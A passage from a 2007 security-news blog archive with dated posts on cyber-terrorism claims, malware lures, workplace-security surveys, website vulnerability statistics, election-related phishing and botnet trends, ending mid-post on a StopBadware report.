Security Watch | Matt Hines » October 2007

October 31, 2007 | Comments: (0)

Security researchers highlight potential cyber-Jihad

TAGS: Security

Citing reports published in Debkafile -- an Israeli news outlet that boasts a behind-the-scenes view into Middle East military conflicts and terrorist activity -- security researchers are warning of a potential "cyber-Jihad" set of attacks to be carried out by backers of Osama Bin Laden in mid-November.

If the newest cyber-terrorism reports prove to be accurate, attackers may also have an updated and more comprehensive malware tool in their hands to help carry out the effort, according to experts at Secure Computing.

Debkafile -- which bases many of its news stories on tips from unidentified sources and has published erroneous reports of potential terrorist threats in the past -- said in a news story posted online that Bin Laden and his al Qaeda supporters released an electronic announcement detailing their planned cyber-attacks on Monday.

"On Sunday, Nov. 11, al Qaeda's electronic experts will start attacking Western, Jewish, Israeli, Muslim apostate and Shiite Web sites," the announcement read, according to Debkafile. "On day one, they will test their skills against 15 targeted sites [and then] expand the operation from day-to-day thereafter until hundreds of thousands of Islamist hackers are in action against untold numbers of anti-Muslim sites."

The news site said that the announcement was transmitted in Arabic and intercepted by unnamed "counter-terrorism" sources.

The al Qaeda threat also reportedly promised an impenetrable e-mail network for use by potential volunteers participating in the attacks through which they will be able to contact and receive instructions from project leaders and communicate with others involved in the campaign.

The effort is being carried out in retaliation to tactics being utilized by Western intelligence agencies that have been actively taking down terrorist support Web sites, Debkafile reported.

Security researchers have long debated the validity of threats of cyber-terrorism.

For the most part the attacks have proven over-hyped, but the potential for such coordinated campaigns, and the damage they might incur on critical infrastructure, have been thoughtfully played out in recent years in books such as cyber-terrorism expert Richard A. Clarke's novel "Breakpoint."

Previous announcements that have offered similar threats of impending "cyber-Jihads," including those that have carried almost the same language as the newest report have proven inaccurate -- such as one that closely followed the 9/11 attacks that was released in Oct. 2001.

Among the few real ties that have been established between radical Muslim groups and online attacks in recent years have been reports produced by security researchers detailing of the existence of groups such as the Q8Army -- a malware distribution and botnet control outfit which is believed to operate out of the Middle East and has been known to distribute messages of "world domination" by radical Muslims along with its virus code.

According to Chris Boyd, a researcher with messaging software maker FaceTime Communications who has tracked botnet operators and attempted to follow the flow of the groups' financial resources, Q8Army has used some of the funds derived via its network of online schemes to purchase mobile communications gear, laptop computers and other types of field equipment.

Some people believe that the massive denial-of-service attack carried out against Estonian Web sites earlier this year -- believed to be spearheaded by Russian hackers angry with Estonian government policies -- was a precursor to the types of cyber-terrorist threats the world will actually see more of in the coming years.

Security researchers at software maker Secure Computing say that despite the fact that previous cyber-Jihad attacks haven't materialized, potential participants in such a scheme may already have a powerful new tool in their hands.

The mass distribution of a comprehensive "electronic Jihad software program" over the last several years may be cause for concern, Secure said.

The application offers a point-and-click user interface for use by aspiring participants -- which may have greatly expanded the reach of the malware tool, based on its improved ease-of-use -- Secure said in an e-mail sent to reporters on Wednesday.

Secure also said that the program -- which it has labeled as Electronic Jihad Version 2.0 -- is being supported by multiple Web sites that offer tutorials on its use, including some that the company has captured and translated into English.

The latest version of the software also adds expanded coordination capabilities, Secure said, which are meant to help users of the program aim their efforts at the same sites being attacked by others employing the program, according to the company.

We'll see what happens on Nov. 11.

Posted by Matt Hines on October 31, 2007 12:28 PM

October 30, 2007 | Comments: (0)

Happy Halloween: Malware costumes trick or treat

TAGS: Security

With Halloween lurking tomorrow evening, I'm sure that some of you, like me, are scratching your heads trying to come up with a fresh idea to impress all the peeps at your favorite annual costume bash.

It dawned on me some time ago that there are some great potential alternatives to choose from, costume-wise, when considering all the characters that make up the oddball world of IT security.

Considering this context, one can select from security-oriented outfits including hackers, crackers and cyber-criminals (try to look rich and indifferent), as well as trade show booth babes, shoddily-clad AV marketing execs, tech journalists (mandatory goatee, eyeglasses, and stomach paunch), VC-backed start-up CEOs (obligatory giant new watch) or even some of the types of people you run into at Black Hat and DefCon each year (wear a black T-shirt and try to look jaded at all times).

Of course, the hackneyed hacker world costume idea of the year (if your friends are just as geeky as you are, dear readers) might be to dress up like NBC "Dateline" Producer Michelle Madigan, wearing a blond wig and "hidden" microphone, and then run away as soon as anyone asks who you're supposed to be and pretend to call your bosses on your cell phone.

The same M.O. got Madigan a lot of attention at DefCon after all -- just don't expect to win any prizes or get much candy. Or to tape a sensationalistic undercover TV show.

My personal preference might be to dress up as an Eastern European hacker, as all it would involve is a rumpled Member's Only jacket, three days of beard growth and strikingly strong cigarette breath -- but as this outfit so closely resembles my personal appearance it probably misses the idea of changing one's feathers for the holiday occasion. Alas.

Anyway, the funny guys over at F-Secure have developed a list of popular malware schemes that try to hide their identities, and tabbed them with some costume-oriented themes.

They may not help you woo that attractive JavaScript coder dressed up like Yuna from "Final Fantasy" at your party tomorrow night, but hey, they're giving bloggers like me a chance to weave some colorful Halloween joy into this otherwise black-and-white world.

According to F-Secure, some of the best malware costumes over the past few years have been:

The Chameleon: Attacks like the Storm Worm that shift their colors on a seemingly endless basis. Today's e-mail porn is tomorrow's new YouTube video, or maybe it's a game or an e-card. The fun just never ends with this group. The treat is that you get to see a cruddy image or a broken Java game. The trick is you get to join a massive worldwide botnet. Good times.

The Bill Collector: Viruses like Haxdoor that claim to be related to online purchases or eBay transactions that never really happened. The treat is that the advertised e-commerce problem actually never occurred. The trick is that after you download the virus, your machine will get swamped with keyloggers and rootkits, and then it will really happen.

The Starlet: A time-honored favorite that made Anna Kournikova nearly as famous for her link to malware as she was made famous for her, um, tennis skills? You just can't help yourself, there aren't enough malware-free images of naked women on the Net for you. You… must… click… the… link. The treat is that you get to see some racy pic. The trick is that hackers get to see the inside of your bank account.

The Casanova: We all remember the LoveLetter e-mail, that romantic-themed attack that arrived as a plea from a long-lost lover for further explanation of your wandering ways. If you fall for this one, you probably don't deserve to have any money in your PayPal account because you're already lecherous creep. Or you're just sensitive and vulnerable. Treat is that you think someone cares about you, deeply. Trick is that the only one who cares is some dude in Estonia who wants to hack your eTrade account.

The Hero: Like the Swen.A virus, attacks that disguise themselves as something helpful, like a security update from Microsoft. Treat is that you think you're improving the protection of your computer. Trick is that you've now made your OS even less secure than Microsoft made it out of the box. Boo.

Enjoy the evening.

Posted by Matt Hines on October 30, 2007 02:12 PM

October 29, 2007 | Comments: (0)

Auditors - employees missing big picture risks

TAGS: Security

If your company is undergoing any type of IT security audit this year, there's a strong likelihood that the experts who come in the door to test your systems will be somehow associated with, or certified by, ISACA.

The nonprofit organization -- formerly known as the Information Systems Audit and Control Association -- serves as an industry body representing the professionals who carry out regulatory audits covering SOX, HIPPA and PCI -- among other regulations, and who will become intimately familiar with all the weak points of your company's networks, applications and security policies -- should you have any. (writer stifles laugh)

In a new study to be released later this week, ISACA is sharing the results of a survey it sponsored that reviews just how significantly the human factor is currently playing into the whole process of IT security.

The results highlight the fact that despite all the strong technology and comprehensive process that many organizations have been pushing to adopt in recent years, that it is in fact people who remain one of the most significant vulnerabilities inside many business environments today.

For starters, ISACA's study -- which was actually carried out by MARC Research, and involved phone interviews carried out with roughly 300 white collar workers during Q3 2007 -- found that 35 percent of those surveyed admitted to violating their company's security policies at least once.

Combine those results with the notion that many of these types of incidents also likely occur without employees' knowledge of their mistakes, and the survey result gains even more weight in terms of its overall gravity.

Among the technologies that the workers interviewed admitted to using that could compromise their employers' policies were P2P file-sharing services, with 15 percent of those surveyed claiming to have utilized the tools while at work.

P2P applications are frequently cited by security researchers as an increasingly popular vehicle for delivering malware and other attacks to end users, or for creating botnets of infected devices.

Seemingly even worse, 65 percent of those interviewed reported that they are unconcerned with securing their privacy while using a workplace computer in general, and 63 percent said that do not worry about the security of the information they handle at work whatsoever.

Somehow I'm thinking those people interviewed were not working at large financial service companies… but consider that they likely could be working at retailers or some other type of company that holds your personal information, someone like TJX Companies, for instance.

Of those people who said they are not worried about organizational security issues as they go about their work, 74 percent said that they do not feel it is a risk to their employer to download personal software onto their work PCs, even if some of it might constitute malware or some program that could lead to infection.

Consider that security researchers frequently cite well-known and widely-used applications including IM and VoIP client software programs as among the most popular avenues for potential attacks today.

The more worrisome group of respondents to the ISACA study also identified personal e-mail as another favorite application they feel appropriate for work usage, with 73 percent admitting that they tend to use the tools while on the job.

How dire a situation that fact might indicate is again unclear based on the types of jobs these people surveyed are performing. For instance, if they're reading Gmail while working in anything other than a tightly-controlled environment where workers have access to lots of sensitive data that could be copied -- or they aren't working at a financial services firm where outside e-mail is typically banned -- this result might not be surprising or shocking.

On the other hand, if they are in one of those more security-centric settings, it's a really big deal.

In addition to providing a means for contracting potential malware attacks using such a tool that essentially flies under the network's radar, the ability to cut-and-paste corporate information and send it out of the company network presents a massive risk for leakage or corporate espionage.

ISACA takes a predictably conservative stance on the use of such programs, and a lack of security acumen among workers, since it backs these auditors who are performing the work. But consider the implications for the auditors themselves, some of whom will be responsible for handing out failing compliance grades that lead to financial penalties, or even jail time, for those responsible for securing the systems that are being tested.

At the end of the day the most important thing is that workers understand the implications of their jobs in terms of how they effect your organizations' bigger picture considerations, experts with the group maintain.

"Companies and employees should be very concerned about their personal and corporate data in light of this information," said John Pironti, a security expert at services provider Getronics who also reps for ISACA. "A single seemingly harmless activity, such as using peer-to-peer networks while at work, can breach the confidentiality and security of an entire corporate network, including all of the documents, data and internal communications that reside on that network."

Such research forces one to consider just when it will be that the companies who are being audited and/or experiencing data leaks begin seeking jail time and civil penalties against workers who fail to follow corporate policies.

My guess is not long now.

Posted by Matt Hines on October 29, 2007 09:39 AM

October 25, 2007 | Comments: (0)

California fires, heated politics stoke online schemes

TAGS: Security

Websense PR chief Cas Purdy sent along details of the security vendor's experiences this week as the wild fires raged across Southern California and around its San Diego headquarters.

Along with some other personal stories and images shared by friends in San Diego, it sounds like it was a pretty hairy week for a lot of people in the area, if not at least a very stressful time for an even greater number.

Websense's headquarters is located in an area that was never evacuated, and Purdy said that the company leaned on procedures it installed after another set of serious fires touched the region in 2003 to keep everything running smoothly throughout the week.

The company let its employees work from home after the incident began to widen rapidly on Tuesday, Purdy said, and redundancy plans installed after the 2003 fires handled any related shifts in technical and customer support operations. The vendor also maintains worldwide data operations in the name of providing failsafe services to its customers, he said.

Alas, Websense also points out in a blog today that online scammers have already begun focusing their sites on the California fires.

The company specifically pointed out that a number of seemingly questionable eBay auctions have been set up in the last two days by people asking for donations and claiming to represent various public agencies, including local fire departments and the Red Cross.

At least one auction posting out of Brooklyn, N.Y., Thursday afternoon advertised bids in support of a poorly-described effort pledging support for children affected by the fires. However, the seller listed in the eBay auction has carried out some 200 transactions in the last year, with a near-perfect user experience rating -- pointing to either a misunderstanding, or a hijacked eBay account being used to carry out the campaign.

Websense merely points to a similar ad and warns people to keep their guard up when looking to donate through legitimate channels.

In another interesting twist on the headline-chasing trend among malware, spam and online scam brokers that has helped power the Storm Worm into what by most estimates was once or remains a titanic Trojan-fed P2P botnet -- researchers at AV software maker F-Secure unearthed some nasty politically-fed attacks in Africa this week.

In an attack that the Finnish firm discovered in Kenya, it appears that someone is trying to discredit one of the East African nation's current presidential candidates, Stephen Kalonzo Musyoka -- a former foreign minister in the Sub-Saharan country, using a malware program advertised in his name that damages end users' Windows-based computers.

After luring people to download the program with a Windows-style pop-up that references the candidate's "vision" -- the Trojan, dubbed by F-Secure as Trojan:W32/Agent.DPL -- directs an affected computer's browser to the candidate's official Web site while simultaneously hacking the machine's Window's registry.

Once the program has infected a PC, the user is unable to locate Windows functions via the taskbar controls. According to researchers at F-Secure (who most certainly must be celebrating the F1 automobile racing championship of countryman Kimi Raikkonen, the third such Finnish driver to win the illustrious title) it is likely that some opponents of Musyoka have launched the attack to cut into his overall credibility.

The social and physical fires that burn around the world clearly continue to provide ample fuel to stoke the fires of online deceit.

Posted by Matt Hines on October 25, 2007 03:56 PM

October 16, 2007 | Comments: (0)

Study - Unapproved apps costly to security

TAGS: Security

You might want to stop using Skype, BitTorrent and Worlds of Warcraft at the office, unless your IT department has approved the technologies (or if, you know, you actually want to get any work done).

FaceTime Communications has published its third annual report on security costs related to the use of so-called greynets -- identified by the company as consumer-oriented communications applications dragged into the workplace without permission from IT -- and the security company maintains that the technologies are currently costing enterprise customers roughly twice as much as one year ago.

According to FaceTime's yearlong survey of 700 employees and IT managers regarding their use and tolerance of greynets, it is nearly impossible to find an enterprise where the applications aren't popping up all over the place.

The report finds that there were an average of nine greynets in use within each of the enterprises interviewed for the study, with 99 percent of IT managers reporting the use of at least one greynet in their organizations (and those are only the ones they actually know about).

Even worse, the applications -- which FaceTime calls out for posing "myriad network and information security risks" related to malware, intellectual property loss, identity theft and compliance risks -- are leading to real attacks, as nine out ten respondents to the survey reported that their company has dealt with a greynet-related security incident sometime in the last six months.

Meanwhile, only three percent of those participating claimed to have avoided greynet-related security problems altogether.

While FaceTime includes applications such as IM and VoIP which are often allowed by IT departments in its study, the company warns that less savory tools such as P2P file sharing systems, video streaming tools, and IP address "anonymizers" shouldn't be allowed by anyone looking to keep their networks protected.

And even in the case of IM and VoIP systems such as Skype, the company is reminding security workers looking to ban the applications that they often "circumvent the traditional security infrastructure designed for e-mail and standard Web traffic."

Based on the survey, the average cost companies have incurred in repairing any damage from greynet-related security incidents on company PCs has more than doubled over last year. Those IT managers surveyed reported that is cost them an average of almost $289,000 to repair or re-image PCs after malware attacks over greynets in the last year alone. The cost reported in the 2006 greynet study charted an average financial impact of only $130,000 per year.

On average, the report contends that IT managers experience nearly 39 greynet-driven incidents per month that require their attention, costing them roughly nine hours of work.

One of the biggest problems with the tools appears to be that end users seem willing to continue to use the technologies even after being told not t do so.

For instance, some 80 percent of IT managers surveyed labeled anonymizers -- which permit anonymous use of the Internet -- as "risky" to corporate networks. Yet, some 57 percent of end users responded that the tools aren't dangerous.

Even with IM, perhaps the most innocuous of the applications (outside of tightly regulated or protected environments where it is forbidden) appears to strike IT workers and end users differently. Some 40 percent of IT managers responded that they feel that public IM use at work poses "serious risk," while another 46 percent said that IM poses "some risk," for a total of 86 percent.

Overall, 36 percent of the employees surveyed said that they have the right to download any tools that help them do their jobs, with 40 percent claiming that they already need the additional programs to do so.

Another problem highlighted in the study is the blurring of the line between personal and work devices -- which FaceTime names as one of the most significant greynet risks. Some 85 percent of those interviewed admitted that they use their work PCs for "personal, non-work purposes."

"This suggests to us that work-provided machines are being used more than ever to download whatever these users feel they need for their work and personal lives with little regard to policies or security," said Frank Cabri, vice president of marketing and product management for FaceTime. "Often times this perception among workers is at odds with what IT people want, which is some level of ability to control, monitor and manage what people are doing on their work PCs."

Cabri contends that companies need to do a better job of keeping workers informed of their policies related to greynet usage, and to implement technological means to try and block the use of applications -- when it seems feasible.

"These IT shops need to understand what employees feel they need to be productive and give them alternatives, sending an IM to a friend probably shouldn't be a violation unless you're working in an industry that forbids it through some type of regulation," he said. "What his problem truly warrants is understanding from both sides to better understand all the needs and risks involved."

"Most people don't intend to download malware intentionally, but they also have to know what clicking on a URL or IM could do to their organizations, and if a company can't get people to change their behavior, they should implement applications control tools and other filters to enforce their policies in real time," said Cabri.

"There's no one way to handle this problem, but if you can use something to let people know that you're watching when they do something that violates policy, there's a much better chance that people will change their behaviors."

Posted by Matt Hines on October 16, 2007 01:33 PM

October 15, 2007 | Comments: (0)

Study - 90 percent of all sites at hacking risk

TAGS: Security

Despite the continued efforts of security researchers, search engine providers and hosting companies to help Web site operators better understand the range of attacks feasting on the Internet -- and in particular the wide range of tactics being used to exploit unprotected but otherwise legitimate URLs -- the latest numbers from WhiteHat Security contend that the problem is only getting worse.

In a new research report, WhiteHat -- the Web applications security founded by vulnerability scanning whiz Jeremiah Grossman -- concludes that as many as 90 percent of all the sites that it has tested in the last year remain open to some form of hijack or infection.

The leading problem remains many sites' vulnerability to cross-site scripting (XSS) hacks, through which attackers place malicious code on legitimate sites to trick end users into handing over their personal information or passwords.

As many as 75 percent of the pages scanned by WhiteHat had some form of XSS-exploitable flaw, according to the paper.

Information leakage -- or the ability to break into areas of a site where potentially sensitive data is stored -- remains another serious problem, according to the company, which reported that the problem ranks as the "top vulnerability class" of all the weaknesses it is finding among the sites it has tested - including XSS-based threats.

WhiteHat also highlighted the increased prevalence of several other types of exploits among the sites it is watching, including SQL Injection and HTTP Response Splitting. The emergence of those attacks can be directly related to the increased use of vulnerability identification technologies, the firm contends.

The company said that HTTP Response Splitting remains "hugely misunderstood and underestimated" and that it continues to evade most scanning tools. As a result, the threats are "startling both in the prevalence and potential consequences" at present, WhiteHat said.

In a recent blog, Grossman described HTTP Response Splitting attacks as such:

"The best way to think about Response Splitting is that it's executed similarly to Cross-Site Scripting (XSS), but more powerful. Take a loose analogy of a written letter in an envelope. XSS targets the message inside the envelope, while Response Splitting targets not only the message inside the envelope, but the envelope itself."

"There several different variations of Response Splitting and many emergent behaviors that make accurate vulnerability identification challenging."

WhiteHat has also begun to warn people about the increased use of Cross-Site Request Forgery.

As part of the third annual WhiteHat Security Statistics Report -- which the testing firm plans to begin issuing quarterly -- the company has also begun looking at the manner in which different vulnerabilities appear to be more popular in individual vertical industries.

For instance, the company found that while Web site security remains weak in general, that the retail sector has managed to secure its URLs better than some other markets. As in the rest of the online world, however, WhiteHat contends that XSS threats top the list of vulnerability classes by vertical, followed closely by Information Leakage.

"These statistics continue to reveal recurring and emerging issues that are affecting Web sites across industries," said Grossman, who wears the title of CTO at WhiteHat. "As increasing amounts of sensitive data are stored online, WhiteHat remains vigilant about alerting companies to common attack methods and emphasizing the importance of Web site vulnerability management as part of their overall security posture."

Posted by Matt Hines on October 15, 2007 01:23 PM

October 09, 2007 | Comments: (0)

The politics of cyber-crime

TAGS: Security

As the presidential race of 2008 nears, there appear to be very few certainties that can be applied to the political runoff.

Beyond the fact that President George W. Bush's tumultuous tenure in the Oval Office will come to a close -- and that e-voting technologies will likely come under a new wave of fire from security researchers -- one other concrete detail appears to be that malware authors, phishers and other assorted cyber-scum will attempt to take advantage of interest in the election to deliver a new wave of attacks.

Last week, Carnegie Mellon University's CyLab project hosted the Anti-Phishing Working Group's eCrime Researchers Summit. As part of the event, a panel of experts including Symantec researcher Oliver Friedrichs debated the various methods that online assailants will employ to aim their wares at unsuspecting voters.

In a blog post on the company's Web site, Friedrichs outlined some of the conclusions that he and the other experts arrived at regarding the upcoming political-security firestorm. The other panelists were Rachna Dhamija from Harvard University, Chris Soghoian from Indiana University, and Pat Clarke of Jackson/Clark Partners.

Friedrichs also took the opportunity to plug a new book he has contributed to dubbed "Crimeware" -- due out in Feb. 2008 -- which will touch on the political-security issue, among many others apparently. Symantec, which will publish the book, has been kind enough to pass along the chapter on this topic free-of-charge to anyone interested in reading it.

Some highlights:

-The existing candidates have not done a thorough job of snapping-up domain names that could be easily associated with their campaigns by attackers looking to ensnare end users.

According to Friedrichs, Symantec performed an analysis of 17 well-known candidate domain names to seek out domain speculators and typo squatters.

"Our results were interesting to say the least," he said. "Candidates have not done a good job at protecting themselves."

A quick exercise in attempting to create URLs that people might fall for finds that some of the obvious ones have been taken by the aspiring presidents, such as www.barackobama.com. However, URLs like www.clintonwhitehouse.com and www.giulianicommittee.com bring up largely undeveloped pages -- likely acquired by squatters hoping to cash-in -- that openly advertise themselves for sale to any interested parties.

One popular technique will be for criminals to create "cousin" sites that closely mimic the candidates legitimate Web pages, as in, www.mitt-romney.com (currently under the control of someone who pitches themselves as an unofficial supporter), versus www.mittromney.com (the candidate's real site).

Squatters and phishers will also piggyback on the typo sites as well, such as www.mitromney.com (currently home to another unofficial supporter), Friedrichs said.

Parody sites and unofficial informational sites (such as those listed above) will also be used to carry out attacks, according to the research.

-The threat of phishing has only grown more severe.

"When considering the 2004 election as a whole, phishing presented only a marginal risk," said Friedrichs. "At the time, phishing itself was still in its infancy, and had yet to grow into the epidemic that can be observed today. When we revisit the potential risk of phishing to the 2008 federal election, we find ourselves in a much different position."

Since online political fundraising and campaigning has become so ubiquitous (I get an e-mail from the DNC every day it seems), the researcher contends it will be relatively easy for attackers to craft effective phishing runs that take advantage of the election buzz.

After performing some additional analysis, Friedrichs suggests that the most dangerous threats will likely seek siphon donations away from legitimate candidates.

Even worse, he believes that people who want to undermine the whole process of garnering online donations will do so by purposefully diverting funds from one candidate to another with opposing beliefs and then publicizing it to discourage the Web-based fundraising practice.

-Adware will be used to "influence or manipulate" voters.

In addition to using fake candidate sites to deliver traditional adware and malware, the Symantec researchers believe that politically-minded attackers could carry out schemes to "silently replace advertisements for one candidate with another."

According to the report these scams would likely be carried out by manipulating incoming HTML in end users' browsers before it is rendered, otr by overlaying their own ad on top of another.

-Spyware may be used to skew election-related data gathering.

Friedrichs points out that spyware programs could be used to capture telltale political end user behavior, such as Web browsing habits, party affiliation, online campaign contributions and e-mail traffic.

With that information in hand, the researcher contends, politically-motivated organizations could conduct secret polls or gather election results sweeps that are essentially fixed beforehand to benefit some candidate or another, or to motivate people to get out and vote.

And there are plenty of other scenarios that could use attacks to alter the campaigning process as well.

Now, about those e-voting machines…

Posted by Matt Hines on October 9, 2007 10:20 AM

October 08, 2007 | Comments: (0)

Records security plans still lagging

TAGS: Security

One of the biggest problems facing companies when they discover a data leakage incident al la TJX Companies is that they finally realize that they don't have a firm handle on just where all their information resides.

It's a story that's repeated time-and-time again by post-breach forensics experts -- whose first job upon being hired after an incident is typically to try and backtrack to figure out just what types and volumes of data have been exposed, and how.

According to a new study from data archiving and storage back-up specialists Iron Mountain, one of the primary reasons that companies often find themselves in this unenviable position is because they lack an enterprise-wide records management strategy in the first place.

In fact, in a recent study that the company completed with 2000 IT professionals and legal experts employed by its customers, roughly 65 percent of those interviewed admitted that they have no over-arching records retention, storage, back-up and management strategy.

The Compliance Benchmark Study published by Iron Mountain on Wednesday illustrates just why so many companies are having trouble protecting themselves from data incidents and responding to them quickly when they occur, according to said Laura McDaniel, director of compliant records management at the firm.

"It's interesting that there's still a lot of room to go, even though there is a greater awareness level regarding this issue than ever there's been," McDaniel said. "From a records management standpoint, most companies may have some sort of retention schedule or policies or procedures in place, but many are still in the dark ages in terms of adopting these rules across their entire organization, especially for electronic records."

Despite the current shortcomings, Iron Mountain found that most firms are trying to improve their standing, with 61 percent of those surveyed reporting that they are committed to records enterprise-wide records management and in the process of outlining new strategies.

Among the other findings:

-Oversight of records management remains unclear in many organizations:

A vast majority 73 percent of respondents said that leadership of their corporate records management programs were "not clearly defined," with many noting that steering committees mean to address the issue have "limited participation from key stakeholders."

Iron Mountain recommends that businesses should establish a senior-level committee to help forward direction and push policies down to rank-and-file workers.

-Records retention is consistent:

Some 81 percent of those interviewed said that they already have a retention schedule to manage records retention as it relates to compliance programs and provides a "blueprint" for all related activities.

Iron Mountain advises that businesses should establish a universal records retention schedule across all of their business units, covering all of their records, regardless of the content's media format.

-Records retrieval is typically accurate and speedy:

Roughly 90 percent of respondents rated their ability to gather records as "effective and accurate."

Iron Mountain said these responses indicate that most companies are satisfied with their ability to retrieve records, and that most organizations appear to understand the basics of record storage, indexing and retrieval.

However, the company contends that organizations always be looking to improve policies and procedures to speed record recovery.

-Secure destruction practices are inconsistent:

Only 38 percent of the organizations surveyed reported that they already have a uniform set of policies in place for the disposal of confidential information, despite many government and industry regulations that require businesses to do so.

Iron Mountain advises that companies should be more consistent, launching comprehensive, organization-wide plans for destruction of both active and inactive records

Companies that participated in the benchmark study can use the results to educate key stakeholders and decision makers in their organization to make improvements to their records management program.

"The good news is that most companies are realizing that they're way under-prepared and that they need to do more than what they're doing currently," said McDaniel. "But most companies do not know where data is and that's part of the early homework; it's very challenging for companies to get arms around this problem, but our advice is to take it one-step-at-a-time and build a multi-year plan."

Posted by Matt Hines on October 8, 2007 12:42 PM

October 04, 2007 | Comments: (0)

Getting more bang from your IT security bucks

TAGS: Security

It's no secret that enterprise customers are getting fed up with how much money they're spending on security these days, but one analyst claims that many businesses could get a lot more out their investments by simply choosing technologies more wisely and taking a closer look at the projects they're involved in.

At next week's (Oct. 7-12) Gartner Symposium/ITxpo 2007 in Orlando, Neil MacDonald, a longtime security analyst who also wears the title of "fellow" at the research firm, will give a presentation (Tuesday at 8 am) dubbed "Fifteen Ways to Spend Less and Become More Secure" during which he'll outline his concepts.

Lucky for all you Zero Day readers who aren't paying to attend the show, we got a sneak peek for free.

According to MacDonald, current enterprise security budgets are "all over the map" with spending ranging anywhere from 3.5 percent of companies' overall IT purses, to as much as 20 percent, with the average being something close to 11.7 percent.

While vendors might not like to hear it, the analyst said this illustrates that many companies are overspending significantly, as he estimates that an intelligent security budget should account for anywhere from 3-6 percent of overall IT spend.

Yet, with all the varieties of threats out there and the pressure to open up infrastructure to greater numbers of shared services and business partners, clearly the process of defending corporate IT assets and data is becoming even more challenging.

"People want to open up more and the attacks are getting harder to spot, but, the spending that's going on just can't continue like it has -- the spending trajectory cannot continue to increase unabated," the analyst said. "What we have now is almost a worst case scenario from a business and management perspective."

Some of MacDonald's tips for reigning in spending follow:

-Companies should take a more process-based approach to security -- addressing different problems cannot be approached as a set of projects, it should instead be handled as a set of processes, he said.

For instance, when dealing with configuration management, MacDonald recommends that companies employ a strategy of looking at the configuration and vulnerability status of every device on the network from a process standpoint before investing in automated tools to address problems.

"Without a process, you can't accurately isolate the right technologies to help automate, there are good tools out there, but you have to investigate which ones fit your environment the best before buying," he said.

-Companies should avoid high-cost projects.

Many high-level, expensive projects that have become popular in recent years -- including single sign-on, risk dashboards, digital rights management and ID access management -- aren't worth all the effort and spend some companies are throwing at them, while the analyst believes that the problems they aim to solve can be addressed in faster, cheaper ways.

"Companies need to stop chasing rainbows and unicorns on projects that never seem to end and have a life of their own," said MacDonald. "A lot of these things have become perennial budget items when in reality they are typically only aimed at getting patchworks in place until better industry solutions arrive."

"For something like single sign-on, companies can use Active Directory; DRM among trading partners might not be feasible to build or sustainable for the long term. Companies should limit that type of project only to people who really need it, for specific groups of workers."

-Ditch best-of-breed for integrated security tools when possible.

It's nice to have leading-edge products for every aspect of security, but it's not practical for anyone but the largest companies who can afford the technologies and the people necessary to do all the integration and management, said the analyst. Endpoint security is one area where there are already opportunities to consolidate security tools, he said.

"The emerging security platforms that pull multiple types of functions into a single product are the biggest area of cost savings we've researched," MacDonald said. "If an organization is using multiple products to defend different types of applications, or the endpoint, they need to centralize and take a closer look at some of the converged products, including those that address security from the operational side."

-Employ internal applications security testing tools during the development process.

With development giants IBM and HP snapping-up apps security specialists Watchfire and SPI Dynamics, respectively, to add testing to their platforms, it will soon become easier for developers to build security testing into their work.

No matter what tools you choose, MacDonald said that making sure that applications have as few code vulnerabilities as possible before they go live can equate to significant savings in money that might be used to protect them after-the-fact.

"This idea seems like a no-brainer, but it's harder in reality because it involves a cultural change in terms of who runs the security tools and who tests the applications," he said. "However, pushing more testing into the development process itself can make a huge difference in the long run. With the acquisitions by HP and IBM, I think there's also some hope for making the transition easier by building the tools right into the development platforms."

Posted by Matt Hines on October 4, 2007 10:04 AM

October 03, 2007 | Comments: (0)

Botnet herders tending smaller flocks

TAGS: Security

For the last year or so, security researchers have been highlighting new techniques being used by botnet schemers to evade detection by anti-virus systems, law enforcement officials and network operators.

Among the most popular tactics that botnet herders have adopted to this end are P2P exploits that propagate themselves and any content they are being used to distribute without the use of traditional command and control centers.

As a whole, savvy botnet herders have also begun to utilize their networks in a far more discreet manner, keeping their zombie PCs lit up for smaller amounts of time and using larger numbers of infected machines to distribute smaller amounts of malware and spam.

Now comes word from researchers at Finjan that botnet keepers are also using smaller networks to help evade the prying eyes of security teams, IT departments, ISPs and other carriers.

As part of this effort, F-Secure contends that botnet operators are also splitting their networks into smaller groups to create "multi-swarm attacks" that are harder for any trackers to follow.

"By escaping detection in this way, criminals can effectively fly their rented botnets in under the security radar, and ensure the swarm hits the relevant Web sites with devastating results," Yuval Ben-Itzhak, CTO at Finjan, said in a research report.

"This is a potentially serious evolution in the world of botnets," he said. "The change in the Web security field has proven to be a difficult task to tackle for traditional security companies. The best way to detect modern malicious code is to be able to understand in real-time what the code intends to do, before it does."

Finjan claims that botnet operators are also increasingly using malware toolkits to build new types of Trojans to deliver their zombie code.

"Our latest [research] exposes numerous new attack vectors that raise the number of Trojan infections that create botnets," said Ben-Itzhak. "The focus has now moved on to the crimeware toolkits that generate the infections more easily and with greater force. The resultant botnet swarm potential from such infections is significant."

In the most recent iteration of its twice-yearly Internet Security Threat Report, Symantec reported that botnets have also taken on an increasingly regional flavor, with Chinese users in particular being assailed by the threats on a far more frequent basis.

Symantec reported in September that China had 29 percent of all the world's bot-infected computers over then first six months of 2007, more than any other country, and said that Beijing was the city with the most infected computers, accounting for seven percent of the worldwide total.

Posted by Matt Hines on October 3, 2007 10:01 AM

October 02, 2007 | Comments: (0)

Stopbadware forwards malware trends, tips

TAGS: Security

Stopbadware.org, the malware and adware tracking research project -- backed by Google (among others) and run out of Harvard Law School's Berkman Center for the Internet and Society -- has published a new report charting many of the trends it has seen emerging in recent months.

And while the paper (PDF) is fairly rudimentary for anyone closely following the malware and adware industries on a daily basis (like me) there are a lot of interesting factoids laced throughout the (well-written and very readable) 12 page report.

For business managers, CEOs and those less familiar with such IT security topics, the paper provides a comprehensive overview of many of the tactics currently being employed by hackers and authors of badware (any application that either tries to hide itself or any of its intentions, based on the parameters of the effort).

Some high points follow.

On hijacked Web sites:

"Malicious hackers are attracted to the areas where easily exploitable vulnerabilities are most commonly found. These vulnerabilities are frequently concentrated on the tightly-packed shared hosting servers commonly used by small Web sites. The tide may slowly be turning, however. More mid-tier hosting providers are becoming aware of the new hacking risks to their customers, and are updating their server software or security permissions systems to help protect the sites they host. Many of the Web site owners StopBadware has spoken with have expressed a willingness to pay a little more in hosting costs for the peace of mind of knowing their site is safer."

On site attack methods:

"Two types of attack emerged as by far the most popular over the first half of 2007. These are the use of iframes to load malicious pages in frames inside otherwise benign pages, and the use of javascript browser exploits. Hidden iframes are most commonly inserted at the very top or the very bottom of a Web page's source code. When used to distribute badware, javascript is often encoded or encrypted to make its malicious nature difficult to detect. "

On adware networks:

